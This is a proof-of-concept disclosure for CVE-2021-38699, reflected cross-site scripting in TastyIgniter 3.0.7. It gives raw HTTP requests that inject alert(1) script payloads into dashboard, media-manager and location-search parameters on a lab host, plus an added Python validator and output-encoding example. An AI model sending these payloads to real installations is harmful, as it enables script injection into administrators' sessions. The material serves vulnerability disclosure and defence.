POC details: 4ae61f25a59c7fdce3954779df4e54b03a06c7e9

Source
Related vulnerability
Title: TastyIgniter cross-site scripting vulnerability (CVE-2021-38699)
Description: TastyIgniter is a free, open-source online ordering system built on the Laravel PHP framework, intended to let developers and restaurant owners enjoy life. TastyIgniter 3.0.7 contains a cross-site scripting vulnerability caused by missing validation of user-submitted data in the /account, /reservation, /admin/dashboard and /admin/system_logs paths.
Description
Multiple Reflected XSS in TastyIgniter v3.0.7 Restaurant CMS
Introduction
# CVE-2021-38699: Multiple Reflected XSS in TastyIgniter v3.0.7 Restaurant CMS

Authenticated reflected XSS exists in the TastyIgniter Admin dashboard in version 3.0.7.

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38699

## POC:

### Admin dashboard start param:

```
POST http://cvefarm.local/admin/dashboard HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-IGNITER-REQUEST-HANDLER: charts::onFetchDatasets
X-CSRF-TOKEN: 37EWVV424abZPiH6H1L6CWZvTYhEfx3XK73Xa4A5
X-Requested-With: XMLHttpRequest
Content-Length: 81
Origin: https://cvefarm.local
Connection: keep-alive
Referer: https://cvefarm.local/admin/dashboard
Cookie: tastyigniter_session=[session/admin_session]
Host: cvefarm.local

start=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&end=2021-08-12T12%3A48%3A16.747Z
```
![2021-08-12 17_47_46-dev-kali - VMware Workstation](https://user-images.githubusercontent.com/57866415/129274696-55bff047-b328-44bf-9a33-0ab498dd934b.png)

###  Admin dashboard end param:

```
POST http://cvefarm.local/admin/dashboard HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-IGNITER-REQUEST-HANDLER: charts::onFetchDatasets
X-CSRF-TOKEN: 37EWVV424abZPiH6H1L6CWZvTYhEfx3XK73Xa4A5
X-Requested-With: XMLHttpRequest
Content-Length: 81
Origin: https://cvefarm.local
Connection: keep-alive
Referer: https://cvefarm.local/admin/dashboard
Cookie: tastyigniter_session=[session/admin_session]
Host: cvefarm.local

start=2021-07-14T12%3A48%3A16.746Z&end=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E
```

![image](https://user-images.githubusercontent.com/57866415/129274604-6406f542-b515-4f3a-862b-1b2246c00ad0.png)


## Media Manager path parameter

```
POST http://cvefarm.local/admin/media_manager HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-IGNITER-REQUEST-HANDLER: manager::onGoToFolder
X-CSRF-TOKEN: QVRktQkPLxizjY3vbMe2dQ5ZgZMfMalZYnQZzMes
X-Requested-With: XMLHttpRequest
Content-Length: 56
Origin: https://cvefarm.local
Connection: keep-alive
Referer: https://cvefarm.local/admin/media_manager
Cookie: tastyigniter_session=[session/admin_session]
Host: cvefarm.local

path=%22%3E%00%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E
```

## Location parameter
```
GET http://cvefarm.local/locations?search=javascript%3Aalert%281%29%3B HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 0
Referer: http://cvefarm.local/locations
Cookie: tastyigniter_session=[session]
Host: cvefarm.local
```
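As an added defender-side example (not code from the original PoC or from TastyIgniter), the Python below shows the two controls that close the four reflected-parameter findings above: strict validation of `start`/`end` (timestamps), `path` (a folder name) and `search` (plain text), and HTML output encoding of anything echoed back. The validation rules, the route table and the helper names are this example's own assumptions about what each parameter should look like, not the project's code.

```python
import re
from datetime import datetime
from html import escape
from urllib.parse import parse_qs

# Shape of the legitimate start/end values in the dashboard PoC
# (e.g. 2021-07-14T12:48:16.746Z): strict ISO-8601 UTC with milliseconds.
ISO_FMT = "%Y-%m-%dT%H:%M:%S.%fZ"
# Any 'scheme:' prefix; the /locations PoC sends javascript:alert(1); as search.
SCHEME = re.compile(r"^\s*[a-z][a-z0-9+.\-]*:", re.I)


def is_timestamp(value):
    """start/end must be a full timestamp; '<script>' is not a date."""
    try:
        datetime.strptime(value, ISO_FMT)
        return True
    except ValueError:
        return False

def is_media_path(value):
    """path must be a relative folder name: no NUL byte, traversal or markup."""
    if "\x00" in value or ".." in value.split("/"):
        return False
    return all(ch.isalnum() or ch in "/_-. " for ch in value)

def is_plain_search(value):
    """search is free text: no markup characters and no URL scheme prefix
    (deliberately conservative: 're: foo' is rejected along with javascript:)."""
    return not SCHEME.match(value) and not any(ch in value for ch in "<>\x00")

# Reflected parameters from the PoC, keyed by route (the rules are this
# example's assumptions, not TastyIgniter's own validation).
RULES = {
    "/admin/dashboard": {"start": is_timestamp, "end": is_timestamp},
    "/admin/media_manager": {"path": is_media_path},
    "/locations": {"search": is_plain_search},
}

def check_request(route, query):
    """Return {param: ok} for a route's reflected parameters, decoding the
    form body / query string as the server would (%3C -> '<', %00 -> NUL)."""
    params = parse_qs(query, keep_blank_values=True)
    return {name: rule(params.get(name, [""])[0])
            for name, rule in RULES.get(route, {}).items()}

def render_reflected(value):
    """Output encoding for anything echoed into HTML: '<script>' becomes
    '&lt;script&gt;' and is displayed rather than executed."""
    return escape(value, quote=True)
```

Feeding the PoC bodies above to `check_request` flags exactly the injected parameter in each request, while `render_reflected` shows what a correctly encoded echo of the payload looks like.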


## Other Images
![2021-08-12 10_13_26-dev-kali - VMware Workstation](https://user-images.githubusercontent.com/57866415/129272524-16dc2e0b-191c-4c87-ae32-8cd71a4d8c61.png)
![2021-08-12 10_13_39-dev-kali - VMware Workstation](https://user-images.githubusercontent.com/57866415/129272533-1b063f32-4cac-44e7-aede-4bfda576b2c6.png)
![unknown](https://user-images.githubusercontent.com/57866415/129272541-2827d108-eb5b-4df8-aea8-4a5ebfad67b0.png)

## Discovery
August 2021
- Matt Kiely | HuskyHacks
- Justin White (https://github.com/Justin-1993/CVE-2021-38699 & https://pentesternotes.com/?p=209)
File snapshot

[4.0K] /data/pocs/4ae61f25a59c7fdce3954779df4e54b03a06c7e9 └── [3.5K] README.md 0 directories, 1 file